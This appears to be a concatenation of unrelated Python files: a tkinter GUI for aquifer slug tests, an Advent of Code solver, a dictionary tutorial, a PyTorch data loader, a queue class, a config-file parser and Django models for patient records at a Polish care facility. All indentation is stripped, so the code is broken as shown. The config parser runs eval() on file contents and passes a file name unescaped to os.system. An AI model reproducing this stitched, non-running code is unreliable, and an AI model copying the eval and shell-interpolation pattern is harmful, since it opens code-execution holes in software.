tk.Label(GUI, text='Thickness of aquifer',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i+2, column= 3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i+2, column=5+j, sticky='W')
AQTHICK=tk.StringVar()
tk.Entry(GUI, textvariable=AQTHICK, width=8).grid(row=i+2, column=4+j)
# slug test characteristics entries
tk.Label(GUI, text='Slug test characteristics',fg='white', font=("Helvetica", "14"), background='#15344E').grid(row=i-7, column=j+3,columnspan=3, sticky='W')
tk.Label(GUI, text='rc - Effective radius well casing',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-6, column=3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-6, column=5+j, sticky='W')
RC=tk.StringVar()
tk.Entry(GUI, textvariable=RC, width=8).grid(row=i-6, column=j+4)
tk.Label(GUI, text='Le - Effective screen length',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-5, column=3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-5, column=5+j, sticky='W')
LE=tk.StringVar()
tk.Entry(GUI, textvariable=LE, width=8).grid(row=i-5, column=j+4)
tk.Label(GUI, text='rw - Effective radius well screen',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-4, column=3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-4, column=5+j, sticky='W')
RW=tk.StringVar()
tk.Entry(GUI, textvariable=RW, width=8).grid(row=i-4, column=4+j)
tk.Label(GUI, text='d - z-position of top of screen',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-3, column=3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-3, column=5+j, sticky='W')
D=tk.StringVar()
tk.Entry(GUI, textvariable=D, width=8).grid(row=i-3, column=4+j)
tk.Label(GUI, text='Re - effective radius parameter',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-2, column=3+j, sticky='W')
tk.Label(GUI, text='[L]',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=i-2, column=5+j, sticky='W')
RE=tk.StringVar()
tk.Entry(GUI, textvariable=RE, width=8).grid(row=i-2, column=4+j)
################# CALCULATION OPTIONS + CALCULATIONS ###########################
# 9 check boxes for the different calculation options
tk.Label(GUI, text='Horizontal hydraulic conductivity',fg='white', font=("Helvetica", "14"), background='#15344E').grid(row=6+i, column=j+3, columnspan=1, sticky='W')
tk.Button(GUI, text='Limitations', command=p.CheckLimitations, fg='white', font=("Helvetica", "10",'bold'),width=10, bg='#2A6496').grid(row=13+i, column=3+j, sticky='W', columnspan=1)
tk.Label(GUI, text='Bouwer & Rice, fully penetrating',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=8+i, column=3+j, sticky='W')
tk.Label(GUI, text='Best range',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=8+i, column=4+j, sticky='E')
V1=tk.IntVar()
tk.Checkbutton(GUI, variable=V1, background='#15344E').grid(row=8+i, column=4+j, sticky='W')
tk.Label(GUI, text='No full recovery',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=8+i, column=6+j, sticky='W')
V2=tk.IntVar()
tk.Checkbutton(GUI, variable=V2, background='#15344E').grid(row=8+i, column=5+j, sticky='E')
tk.Label(GUI, text='All data',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=8+i, column=9+j, sticky='W')
V3=tk.IntVar()
tk.Checkbutton(GUI, variable=V3, background='#15344E').grid(row=8+i, column=8+j, sticky='E')
tk.Label(GUI, text='Bouwer & Rice, partially penetrating',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=9+i, column=3+j, sticky='W')
tk.Label(GUI, text='Best range',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=9+i, column=4+j, sticky='E')
V4=tk.IntVar()
tk.Checkbutton(GUI, variable=V4, background='#15344E').grid(row=9+i, column=4+j, sticky='W')
tk.Label(GUI, text='No full recovery',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=9+i, column=6+j, sticky='W')
V5=tk.IntVar()
tk.Checkbutton(GUI, variable=V5, background='#15344E').grid(row=9+i, column=5+j, sticky='E')
tk.Label(GUI, text='All data',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=9+i, column=9+j, sticky='W')
V6=tk.IntVar()
tk.Checkbutton(GUI, variable=V6, background='#15344E').grid(row=9+i, column=8+j, sticky='E')
tk.Label(GUI, text='Hvorslev, fully penetrating',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=10+i, column=3+j, sticky='W')
tk.Label(GUI, text='Best range',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=10+i, column=4+j, sticky='E')
V7=tk.IntVar()
tk.Checkbutton(GUI, variable=V7, background='#15344E').grid(row=10+i, column=4+j, sticky='W')
tk.Label(GUI, text='No full recovery',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=10+i, column=6+j, sticky='W')
V8=tk.IntVar()
tk.Checkbutton(GUI, variable=V8, background='#15344E').grid(row=10+i, column=5+j, sticky='E')
tk.Label(GUI, text='All data',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=10+i, column=9+j, sticky='W')
V9=tk.IntVar()
tk.Checkbutton(GUI, variable=V9, background='#15344E').grid(row=10+i, column=8+j, sticky='E')
tk.Label(GUI, text='Hvorslev, partially penetrating',fg='white', font=("Helvetica", "11"), background='#15344E').grid(row=11+i, column=3+j, sticky='W')
tk.Label(GUI, text='Best range',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=11+i, column=4+j, sticky='E')
V10=tk.IntVar()
tk.Checkbutton(GUI, variable=V10, background='#15344E').grid(row=11+i, column=4+j, sticky='W')
tk.Label(GUI, text='No full recovery',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=11+i, column=6+j, sticky='W')
V11=tk.IntVar()
tk.Checkbutton(GUI, variable=V11, background='#15344E').grid(row=11+i, column=5+j, sticky='E')
tk.Label(GUI, text='All data',fg='white', font=("Helvetica", "10"), background='#15344E').grid(row=11+i, column=9+j, sticky='W')
V12=tk.IntVar()
tk.Checkbutton(GUI, variable=V12, background='#15344E').grid(row=11+i, column=8+j, sticky='E')
# button to perform calculations
tk.Button(GUI, text='Calculate', command=p.PerformCalc, fg='white', font=("Helvetica", "10",'bold'), width=10, bg='#2A6496').grid(row=13+i, column=3+j, columnspan=1)
# button to save the results
tk.Button(GUI, text='Save', command=p.SaveResults, fg='white', font=("Helvetica", "10",'bold'), width=10, bg='#2A6496').grid(row=13+i, column=3+j, columnspan=1, sticky='E')
# button to close the GUI
tk.Button(GUI, text="Close", command=GUI.destroy,fg='white', font=("Helvetica", "10",'bold'), width=10, bg='#2A6496').grid(row=i+13, column=j+6, columnspan=4, sticky='E')
tk.mainloop( ) # keeps the GUI open
|
import re
class AdventOfCode:
def __init__(self, filename):
with open(filename) as f:
self.input = f.read().splitlines()
buses = self.input[1].split(',')
self.times = []
for i, bus in enumerate(buses):
if bus != 'x':
self.times.append((i, int(bus)))
def part1(self):
t0 = int(self.input[0])
min_wait = 1_000_000_000
min_bus = 0
for bus in self.times:
t = bus[1] - (t0 % bus[1]) if t0 % bus[1] > 0 else 0
if t < min_wait:
min_wait = t
min_bus = bus[1]
return min_wait*min_bus
def part2(self):
n = 0
interval = self.times[0][1]
all_t = frozenset(self.times[1:])
found_t = set()
while len(found_t) < len(all_t):
n += interval
for bus in all_t - found_t:
if (n+bus[0]) % bus[1] == 0:
found_t.add(bus)
interval *= bus[1]
return n
|
#my_dict ={key:value,key:value}
my_dict ={"name":"Farjad","age":30,"gender":"Male"}
print(len(my_dict))
print(my_dict.keys())
print(my_dict.get("name"))
print(my_dict.values())
print(my_dict.items())
my_dict["email"]= "farjad@gmail.com"
print(my_dict["email"])
my_dict["email"]= "ali@gmail.com"
print(my_dict["email"])
# finding key
print("email" in my_dict)
#delting
del my_dict["email"]
print(my_dict)
#iterating keys
for keys in my_dict.keys():
print(keys)
#iterating values
for value in my_dict.values():
print(value) |
# adult.py
import torch
import scipy.io as sio
import pytorch_lightning as pl
from torch.utils.data import DataLoader
class PrepareAdult(pl.LightningDataModule):
def __init__(self, root, split):
self.data = sio.loadmat(root + 'adult_binary.mat')
if split == 'train':
x = torch.from_numpy(self.data['D']).float()
y = torch.from_numpy(self.data['Y']).long().squeeze()
s = x[71, :]
self.x = torch.t(x)
self.y = torch.t(y)
self.s = torch.t(s).unsqueeze(1)
if split == 'test' or split == 'val':
x = torch.from_numpy(self.data['D_test']).float()
y = torch.from_numpy(self.data['Y_test']).long().squeeze()
s = x[71, :]
self.x = torch.t(x)
self.y = torch.t(y)
self.s = torch.t(s).unsqueeze(1)
def __len__(self):
return len(self.x)
def __getitem__(self, index):
x, y, s = self.x[index], self.y[index], self.s[index]
return x, y, s
class Adult(pl.LightningDataModule):
def __init__(self, opts):
super().__init__()
self.opts = opts
if opts.ngpu == 0:
self.pin_memory = False
else:
self.pin_memory = True
def train_dataloader(self):
dataset = PrepareAdult(self.opts.dataroot, 'train')
loader = DataLoader(
dataset=dataset,
batch_size=self.opts.batch_size_train,
shuffle=True,
num_workers=self.opts.nthreads,
pin_memory=self.pin_memory,
)
return loader
def val_dataloader(self):
dataset = PrepareAdult(self.opts.dataroot, 'val')
loader = DataLoader(
dataset=dataset,
batch_size=self.opts.batch_size_test,
shuffle=False,
num_workers=self.opts.nthreads,
pin_memory=self.pin_memory,
)
return loader
def test_dataloader(self):
dataset = PrepareAdult(self.opts.dataroot, 'test')
loader = DataLoader(
dataset=dataset,
batch_size=self.opts.batch_size_test,
shuffle=False,
num_workers=self.opts.nthreads,
pin_memory=self.pin_memory,
)
return loader
|
from collections import deque
class Shop:
Max = 0
def __init__(self):
self.Queue = deque()
def add_Queue(self, object):
if (len(self.Queue) == 10):
return False
else:
self.Queue.append(object)
return True
def get_Queue(self):
return self.Queue
def attend(self, time):
if (self.Max == time):
self.Max = 0
def status_queue(self):
if len(self.Queue) == 0:
return True
else:
return False
def status(self):
if self.Max != 0:
return False
else:
return True |
"""
#############################################################################################################
Utilities for handling command-line arguments, and for parsing configuration files.
The config files should be textual, in which each line can contain:
- a comment, starting with char '#'
- an empty line
- the name of the variable and its value, separated with tab or spaces
The content of config files should be fed to the config dictionaries in the main python scripts.
alex 2019
#############################################################################################################
"""
import os
import sys
import argparse
import mesg as ms
from arch import layer_code
DEBUG0 = False # enable debugging print
DEBUG1 = False
def get_args():
""" -----------------------------------------------------------------------------------------------------
Parse the command-line arguments defined by flags
return: [dict] args (keys) and their values
----------------------------------------------------------------------------------------------------- """
parser = argparse.ArgumentParser()
parser.add_argument(
'-c',
'--config',
action = 'store',
dest = 'CONFIG',
type = str,
required = True,
help = "Config file describing the model architecture and training parameters"
)
parser.add_argument(
'-l',
'--load',
action = 'store',
dest = 'LOAD',
type = str,
default = None,
help = "Folder or HDF5 file to load as weights or entire model"
)
parser.add_argument(
'-T',
'--train',
action = 'store_true',
dest = 'TRAIN',
help = "Execute training of the model"
)
parser.add_argument(
'-r',
'--redir',
action = 'store_true',
dest = 'REDIRECT',
help = "Redirect stderr and stdout to log file"
)
parser.add_argument(
'-s',
'--save',
action = 'count',
dest = 'ARCHIVE',
default = 0,
help = "Archive config files [-s] and python scripts [-ss]"
)
parser.add_argument(
'-g',
'--gpu',
action = 'store',
dest = 'GPU',
required = True,
help = "Number of GPUs to use (0 if CPU) or list of GPU indices"
)
parser.add_argument(
'-f',
'--fgpu',
action = 'store',
dest = 'FGPU',
type = float,
default = 0.90,
help = "Fraction of GPU memory to allocate"
)
return vars( parser.parse_args() )
def get_args_eval():
""" -----------------------------------------------------------------------------------------------------
Parse the command-line arguments defined by flags.
This version is created for exec_eval.py
return: [dict] args (keys) and their values
----------------------------------------------------------------------------------------------------- """
parser_e = argparse.ArgumentParser()
parser_e.add_argument(
'-m',
'--model',
action = 'store',
dest = 'MODEL',
type = str,
required = False,
default = None,
help = "Pathname of folder containing the model result"
)
parser_e.add_argument(
'-l',
'--list',
action = 'store',
dest = 'MODELS',
type = str,
required = False,
default = None,
help = "List of pathnames of several folders of models result"
)
parser_e.add_argument(
'-i',
'--img',
action = 'store',
dest = 'IMAGE',
type = str,
required = False,
default = None,
help = "Pathname of image file to use as input for prediction"
)
parser_e.add_argument(
'-s',
'--seqs',
action = 'store',
dest = 'IMAGES',
type = str,
required = False,
default = None,
help = "List of pathnames of image folders image to use as input for prediction"
)
return vars( parser_e.parse_args() )
def get_config( fname ):
""" -----------------------------------------------------------------------------------------------------
Return the content of a config file in the form of a dictionary
fname: [str] path of config file
return: [dict] content of the file
----------------------------------------------------------------------------------------------------- """
cnfg = dict()
if not os.path.isfile( fname ):
ms.print_err( "Configuration file \"{}\" not found.".format( fname ) )
if DEBUG0:
ms.print_msg( cnfg[ 'log_msg' ], "Reading configuration file \"{}\".\n".format( fname ) )
os.system( "cat %s" % fname )
with open( fname ) as doc:
for line in doc:
if line[ 0 ] == '#': continue # comment line
if DEBUG1:
print( line )
c = line.split( '#' )[ 0 ] # remove any following comment
c = c.split()
if len( c ) == 0: continue # empty line
cnfg[ c[ 0 ] ] = eval( str().join( c[ 1: ] ) )
return cnfg
def load_config( cnfg, dest ):
""" -----------------------------------------------------------------------------------------------------
Use the first dict to fill the value of the second dict, in case of common keys
cnfg: [dict] one with all configs
dest: [dict] one to be filled
----------------------------------------------------------------------------------------------------- """
for k in dest.keys():
if k in cnfg.keys():
dest[ k ] = cnfg[ k ]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.urls import reverse
from django.contrib.auth.models import AbstractUser, Group
from django.db.models import Q
import datetime
from django.db import models
from .validators import *
from .managers import *
from django.core.exceptions import ValidationError
import pytz
import calendar
from django.utils import timezone
import itertools
from django.shortcuts import get_object_or_404
from django.db.models.signals import post_save
from django.dispatch import receiver
utc = pytz.timezone('Europe/Warsaw')
def date_validator(data):
try:
data = data.date()
except:
pass
return data
#User Model
class CustomUser(AbstractUser):
department_choices = (('lekarz','lekarz'),('pielegniarka', 'pielegniarka'),('psycholog','psycholog'),('farmaceuta','farmaceuta'),('administracja','administracja'))
PWZ = models.CharField(max_length=10, blank = True, unique=True)
department = models.CharField(max_length=20, choices = department_choices)
def get_username(self):
return self.first_name+ ' '+ self.last_name
#auto add to goup same as department
@receiver(models.signals.post_save, sender=CustomUser)
def post_save_user_signal_handler(sender, instance, created, **kwargs):
if created:
group = Group.objects.get(name=instance.department)
instance.groups.add(group)
instance.save()
#App Models
class BaseModel(models.Model):
created = models.DateTimeField(auto_now_add = True)
modified = models.DateTimeField(auto_now = True)
class Meta:
abstract = True
class Choroba(models.Model):
kod = models.CharField(max_length=6)
nazwa = models.CharField(max_length=100)
def __str__(self):
return self.kod + " " +self.nazwa
#Main Model
class Pacjent(BaseModel):
#--Choices
plec_choices = (('M', 'Mezczyzna'),('K','Kobieta'))
tryb_choices = (('PILNY', 'PILNY'),('STABILNY','STABILNY'))
#--Default
slug = models.SlugField()
#--Dowod osobisty
imie = models.CharField(max_length=50)
nazwisko = models.CharField(max_length=50)
nazwisko_rodowe = models.CharField(max_length = 50, blank = True)
pesel = models.CharField(max_length=11, validators = [validate_pesel], unique = True)
plec = models.CharField(max_length=1, choices=plec_choices)
adres =models.CharField(max_length=500, blank=True)
miejsce_urodzenia = models.CharField(max_length = 50, blank = True)
imiona_rodzicow = models.CharField(max_length = 100, blank = True)
nr_dowodu = models.CharField(max_length = 10, blank = True, validators = [validate_IDnr])
#--Legitymacja ZUS
nr_leg_zus = models.CharField(max_length = 24, blank = True, validators = [validate_nr_leg_zus])
data_wydania_zus = models.DateField(null = True, blank = True)
data_waznosci_zus = models.DateField(null = True, blank = True)
#--Wniosek
nr_ksiegi = models.CharField(max_length=9, blank=True)
osoba_kontaktu = models.TextField(blank=True, verbose_name=("Osoba do kontaktu"))
wysokosc_swiadczenia = models.PositiveSmallIntegerField(null = True, blank = True)
data_przyjecia = models.DateField()
tryb_przyjecia = models.CharField(max_length = 8, choices=tryb_choices, blank = True)
data_skierowania = models.DateField(null = True, blank = True)
pwz_zlecajacego =models.IntegerField(null = True, blank = True, validators = [validate_PWZ])
oddzial_zlecajacego = models.CharField(max_length = 50, blank = True, verbose_name=('Nazwa oddziału kierującego'))
kod_oddzial_zlecajacego = models.CharField(max_length = 4, blank = True, verbose_name=("Kod oddziału VIII"))
regon_szpitala = models.CharField(max_length = 9, blank = True)
nazwa_szpitala = models.CharField(max_length = 60, blank = True)
nr_rej_szpitala = models.CharField(max_length = 12, blank = True, verbose_name=("Numer rejestracyjny szpitala I"))
nr_umowy_szpitala = models.CharField(max_length = 10, blank = True, verbose_name=("Numer umowy szpitala"))
nr_wew_oddzialu = models.CharField(max_length = 3, blank = True, verbose_name=("Kod oddziału VII"))
#--Medyczne
wzrost = models.PositiveSmallIntegerField(null = True, blank = True)
waga = models.PositiveSmallIntegerField(null = True, blank = True)
epikryza = models.TextField(blank=True)
zalecenia = models.TextField(blank=True)
wyniki = models.TextField(blank=True)
chorobowosc = models.ManyToManyField(Choroba, through = 'Chorobowosc',related_name='pacjent_choroba', symmetrical = False)
choroby = models.TextField(blank=True)
#--Managers
wszyscy = WszyscyManager()
class Meta:
verbose_name_plural = "Pacjenci"
verbose_name = "Pacjent"
ordering = ['nazwisko']
def save(self, *args, **kwargs):
self.slug = self.pesel
try:
self.nr_ksiegi = str(str(int(Pacjent.wszyscy.latest('created').nr_ksiegi[:-5])+1)+"/"+str(datetime.datetime.today().year))
except:
self.nr_ksiegi = '00/0000'
return super(Pacjent, self).save( *args, **kwargs)
def get_absolute_url(self):
return reverse('pacjent_detail', args=[str(self.slug)])
#Policz wszystkie dni od poczatku pobytu
def policz_pobyt(self):
dates=[]
zacznij = self.data_przyjecia
try:
skoncz = self.zgon.data
except:
skoncz = datetime.datetime.today().date()
delta = int((skoncz - zacznij).days)
for i in range(delta+1):
if skoncz >= zacznij:
dates.append(zacznij)
zacznij += datetime.timedelta(days=1)
return dates
#Policz dni pobytu w zadanym okresie
def pobyt_w_miesiacu(self,data_od, data_do):
data_od = date_validator(data_od)
data_do = date_validator(data_do)
return set([ date for date in self.policz_pobyt() if data_do >= date >= data_od])
#Rozlicz konkretnego pacjenta w podanych datach
def rozlicz(self,data_od, data_do):
data_od = date_validator(data_od)
data_do = date_validator(data_do)
dni_wypis = set(itertools.chain.from_iterable([el.days_in_month(data_od, data_do) for el in self.wypis_set.all()]))
dni_przepustka = set(itertools.chain.from_iterable([el.days_in_month(data_od, data_do) for el in self.przepustka_set.all()]))
dni_zywienie_6 = set(itertools.chain.from_iterable([el.days_in_month(data_od, data_do) for el in self.zywienie_set.all().filter(glasgow__gt=8)]))
dni_zywienie_7 = set(itertools.chain.from_iterable([el.days_in_month(data_od, data_do) for el in self.zywienie_set.all().filter(glasgow__lte=8)]))
dni_pobyt = self.pobyt_w_miesiacu(data_od,data_do) - dni_wypis - dni_przepustka
dni_zywienie_6.intersection_update(dni_pobyt)
dni_zywienie_7.intersection_update(dni_pobyt)
dni_pobyt = dni_pobyt - dni_zywienie_6 - dni_zywienie_7
return dni_pobyt, dni_zywienie_6, dni_zywienie_7, dni_wypis, dni_przepustka
def __str__(self):
dzis = datetime.datetime.today().date()
return self.nazwisko + " " +self.imie
class Chorobowosc(models.Model):
pacjent = models.ForeignKey(Pacjent, on_delete=models.CASCADE, related_name = 'pacjent_obiekt')
choroba = models.ForeignKey(Choroba, on_delete=models.CASCADE)
def get_absolute_url(self):
return reverse('choroby_update', kwargs = {'slug':self.pacjent.slug} )
#Base for zgon, dekursus pielegniarki, lekarza i psychologa
class PointBase(BaseModel):
data = models.DateField(default = timezone.now)
pacjent = models.ForeignKey(Pacjent, on_delete=models.CASCADE)
user = models.ForeignKey(CustomUser, on_delete=models.PROTECT)
class Meta:
abstract = True
def __str__(self):
return str(self.id)
def get_absolute_url(self):
return reverse(str(self.__class__.__name__).lower(), kwargs = {'slug':self.pacjent.slug} )
class Odlezyna(BaseModel):
lokalizacja = models.CharField(max_length=200)
pacjent = models.ForeignKey(Pacjent, on_delete=models.CASCADE)
def __str__(self):
return self.lokalizacja
def get_absolute_url(self):
return reverse('odlezyna', kwargs = {'slug':self.pacjent.slug} )
class OcenaOdlezyny(BaseModel):
stopien_choices = ((1,'I stopień – blednące po lekkim ucisku zaczerwienienie, które jest efektem reaktywnego przekrwienia.'),
(2,'II stopień – nieblednące zaczerwienienie, rumień nie ustępuje po zniesieniu ucisku.'),
(3,'III stopień – uszkodzenie pełnej grubości skóry do tkanki podskórnej.'),
(4,'IV stopień – uszkodzenie obejmuje tkankę podskórną.'),
(5,'V stopień – głębsza martwica obejmuje głębsze tkanki.'))
odlezyna = models.ForeignKey(Odlezyna, on_delete = models.CASCADE)
data = models.DateField(default = timezone.now)
user = models.ForeignKey(CustomUser, on_delete=models.PROTECT)
stopien = models.PositiveSmallIntegerField(choices= stopien_choices)
interwencja = models.TextField(blank = True)
def get_absolute_url(self):
return reverse('odlezyna', kwargs = {'slug':self.odlezyna.pacjent.slug} )
class Norton(PointBase):
fizykalny_choices = ((4,'4.Dobry'),(3,'3.Dość dobry'),(2,'2.Średni'),(1,'1.Bardzo ciężki'))
swiadomosc_choices = ((4,'4.Pełna przytomność i świadomość'),(3,'3.Apatia dobry'),(2,'2.Zaburzenia świadomośći'),(1,'1.Stupor lub śpiączka'))
aktywnosc_choices = ((4,'4.Chodzi samodzielnie'),(3,'3.Chodzi z asystą'),(2,'2.Porusza sie na wózku'),(1,'1.Leżący'))
samodzielnosc_choices = ((4,'4.Pełna'),(3,'3.Organiczona'),(2,'2.Bardzo ograniczona'),(1,'1.Całkowita niesprawność'))
zwieracze_choices = ((4,'4.Pełna sprawność'),(3,'3.Sporadyczne moczenie'),(2,'2.Zazwyczaj nietrzymanie moczu'),(1,'1.Całkowita nietrzymanie stolca'))
fizykalny = models.PositiveSmallIntegerField(choices = fizykalny_choices, verbose_name = 'Stan fizykalny', default=4)
swiadomosc = models.PositiveSmallIntegerField(choices = swiadomosc_choices, verbose_name = 'Stan świadomośći', default=4)
aktywnosc = models.PositiveSmallIntegerField(choices = aktywnosc_choices, verbose_name = 'Aktywność (przemieszczanie sie)', default=4)
samodzielnosc = models.PositiveSmallIntegerField(choices = samodzielnosc_choices, verbose_name = 'Samodzielność przy zmianie pozycji', default=4)
zwieracze = models.PositiveSmallIntegerField(choices = zwieracze_choices, verbose_name = 'Czynność zwieraczy', default=4)
suma = models.PositiveSmallIntegerField(null=True)
def save(self):
self.suma = sum([self.fizykalny, self.swiadomosc, self.aktywnosc, self.samodzielnosc, self.zwieracze])
return super().save()
class Barthel(PointBase):
posilki_choices = ((0,'0-nie jest w stanie samodzielnie jeść'),(5,'5-potrzebuje pomocy lub wymaga zmodyfikowanej diety '),(10,'10-samodzielny, niezależny '))
przemieszczanie_choices = ((0,'0- nie jest w stanie, nie zachowuje równowagi przy siadaniu'),(5,'5-większa pomoc. może siedzieć'),(10,'10-mniejsza pomoc'),(15,'15-samodzielny'))
higiena_choices = ((0,'0- potrzebuje pomocy przy wykonywaniu czynności osobistych '),(5,'5-niezależny'))
wc_choices = ((0,'0-zależny'),(5,'5-częściowo zależny'),(10,'10-niezależny'))
mycie_choices = ((0,'0-zależny'),(5,'5-niezależny'))
poruszanie_choices = ((0,'0-nie porusza się'),(5,'5-niezależny poruszający się na wózku'),(10,'10-spacery z pomocą jednej osoby, na odległość > 50m '),(15,'15-niezależny >50m'))
schody_choices = ((0,'0-nie jest samodzielny '),(5,'5-potrzebuje pomocy '),(10,'10-samodzielny'))
ubieranie_choices = ((0,'0-zależny'),(5,'5- potrzebuje pomocy'),(10,'10-niezależny'))
stolec_choices = ((0,'0-nie panuje nad oddawaniem stolca'),(5,'5-przypadkowe zdarzenia bezwiednego oddawania stolca,'),(10,'10-kontroluje oddawanie stolca'))
mocz_choices = ((0,'0- nie panuje nad oddawaniem moczu, cewnik'),(5,'5- przypadkowe zdarzenia bezwiednego oddawania moczu'),(10,'10- kontroluje oddawanie moczu'))
posilki = models.PositiveSmallIntegerField(choices = posilki_choices, default = 0, verbose_name = 'Spożywanie posiłków ')
przemieszczanie = models.PositiveSmallIntegerField(choices = przemieszczanie_choices, default = 0, verbose_name = 'Przemieszczanie się (z łóżka na krzesło i z powrotem / siadanie) ')
higiena = models.PositiveSmallIntegerField(choices = higiena_choices, default = 0, verbose_name = 'Utrzymanie higieny osobistej ')
wc = models.PositiveSmallIntegerField(choices = wc_choices, default = 0, verbose_name = 'Korzystanie z toalety (WC) ')
mycie = models.PositiveSmallIntegerField(choices = mycie_choices, default = 0, verbose_name = 'Mycie, kąpiel całego ciała ')
poruszanie = models.PositiveSmallIntegerField(choices = poruszanie_choices, default = 0, verbose_name = 'Poruszanie się (po powierzchniach płaskich) ')
schody = models.PositiveSmallIntegerField(choices = schody_choices, default = 0, verbose_name = 'Wchodzenie i schodzenie po schodach ')
ubieranie = models.PositiveSmallIntegerField(choices = ubieranie_choices, default = 0, verbose_name = 'Ubieranie i rozbieranie się. ')
stolec = models.PositiveSmallIntegerField(choices = stolec_choices, default = 0, verbose_name = 'Kontrolowanie stolca / zwieracza odbytu ')
mocz = models.PositiveSmallIntegerField(choices = mocz_choices, default = 0, verbose_name = 'Kontrolowanie moczu / zwieracza pęcherza moczowego ')
suma = models.PositiveSmallIntegerField(null=True)
def save(self):
self.suma = sum([self.posilki, self.przemieszczanie, self.higiena, self.wc, self.mycie, self.poruszanie, self.schody, self.ubieranie, self.stolec, self.mocz])
return super().save()
class Zgon(PointBase):
pacjent = models.OneToOneField(Pacjent, on_delete = models.CASCADE, primary_key = True)
wyjsciowa = models.ForeignKey(Choroba, on_delete=models.CASCADE, related_name='wyjsciowa_przyczyna', blank=True, null=True)
wtorna = models.ForeignKey(Choroba, on_delete=models.CASCADE, related_name='wtorna_przyczyna', blank=True, null=True)
bezposrednia = models.ForeignKey(Choroba, on_delete=models.CASCADE, related_name='bezposrednia_przyczyna', blank=True, null=True)
godzina = models.TimeField()
class Meta:
verbose_name_plural = "Zgony"
def __str__(self):
return self.pacjent.nazwisko + " "+ self.pacjent.imie+" - "+ str(self.data)
def get_absolute_url(self):
return reverse('zgon', kwargs={'slug':self.pacjent.slug})
class Dekursus_lek(PointBase):
tresc = models.TextField()
important = models.BooleanField(default=False)
class Meta:
verbose_name_plural = "Dekursysy lekarskie"
verbose_name = "Dekursus lekarski"
class Dekursus_piel(PointBase):
tresc = models.TextField()
class Meta:
verbose_name_plural = "Dekursysy pielęgniarskie"
verbose_name = "Dekursus pielęgniarski"
class Dekursus_psych(PointBase):
tresc = models.TextField()
class Meta:
verbose_name_plural = "Dekursysy psychologa"
verbose_name = "Dekursus psychologa"
#Base for wypis, przepustka, zywienie
class PeriodBase(BaseModel):
data_od = models.DateTimeField(default = timezone.now, null=True)
data_do = models.DateTimeField(blank=True, null=True)
pacjent = models.ForeignKey(Pacjent, on_delete=models.CASCADE)
user = models.ForeignKey(CustomUser, on_delete=models.PROTECT)
class Meta:
abstract=True
ordering = ['-data_od']
def get_absolute_url(self):
return reverse(str(self.__class__.__name__).lower(), kwargs={'slug':self.pacjent.slug})
def clean(self,*args, **kwargs):
class_name = str(self.__class__.__name__).lower()+"_set"
q = getattr(self.pacjent, class_name).all().exclude(id__exact=self.id)
przedzial_otwarty = q.filter(data_do__isnull=True)
przedzial_zamkniety = q.filter(data_do__isnull=False)
if przedzial_otwarty.filter(data_od__lte=self.data_od) \
or przedzial_zamkniety.filter(data_od__lte=self.data_od).filter(data_do__gte=self.data_od):
raise ValidationError("Data rozpoczecia pokrywa sie z juz istniejacym: {}".format(class_name[:-4]))
elif self.data_do and (przedzial_otwarty.filter(data_od__lte=self.data_do) \
or przedzial_zamkniety.filter(data_od__lte=self.data_do).filter(data_do__gte=self.data_do)):
raise ValidationError("Data zakonczenia pokrywa sie z juz istniejacym: {}".format(class_name[:-4]))
elif self.data_do and przedzial_zamkniety.filter(data_od__gte = self.data_od).filter(data_do__lte=self.data_do):
raise ValidationError("Okresy {} zawieraja sie w sobie".format(class_name[:-4]))
else:
return super().clean(*args,**kwargs)
def save(self, *args, **kwargs):
class_name = str(self.__class__.__name__).lower()+"_set"
q = getattr(self.pacjent, class_name).all().exclude(id__exact=self.id)
if q.filter(data_od__gte=self.data_od):
self.data_do = q.filter(data_od__gte=self.data_od).order_by('data_od').first().data_od - datetime.timedelta(days=1)
if self.data_od.date() < self.pacjent.data_przyjecia:
self.data_od = self.pacjent.data_przyjecia
try:
if self.data_do.date() > self.pacjent.zgon.data:
self.data_do = self.pacjent.zgon.data
return super().save(*args, **kwargs)
except:
return super().save(*args, **kwargs)
def list_of_dates(self):
try:
self.data_do = self.data_do.date()
except:
self.data_do = utc.localize(datetime.datetime.today()).date()
dates=[]
self.data_od = self.data_od.date()
delta = int((self.data_do - self.data_od).days)
zacznij = self.data_od
for i in range(delta+1):
if self.data_do >=zacznij:
dates.append(zacznij)
zacznij = zacznij + datetime.timedelta(days=1)
return dates
def days_in_month(self, data_od, data_do):
data_od = date_validator(data_od)
data_do = date_validator(data_do)
return frozenset(date for date in self.list_of_dates() if data_do >= date > data_od)
def __str__(self):
data_od = str(date_validator(self.data_od))
data_do = str(date_validator(self.data_do))
return self.pacjent.imie + " "+ self.pacjent.nazwisko+" : "+data_od+ " - "+ data_do
class Zywienie(PeriodBase):
dieta_choices = (('Nutrison','Nutrison'),('Cubison','Cubison'),('Diason','Diason'),('Mix','Mix'),('Naprzemienna','Naprzemienna'))
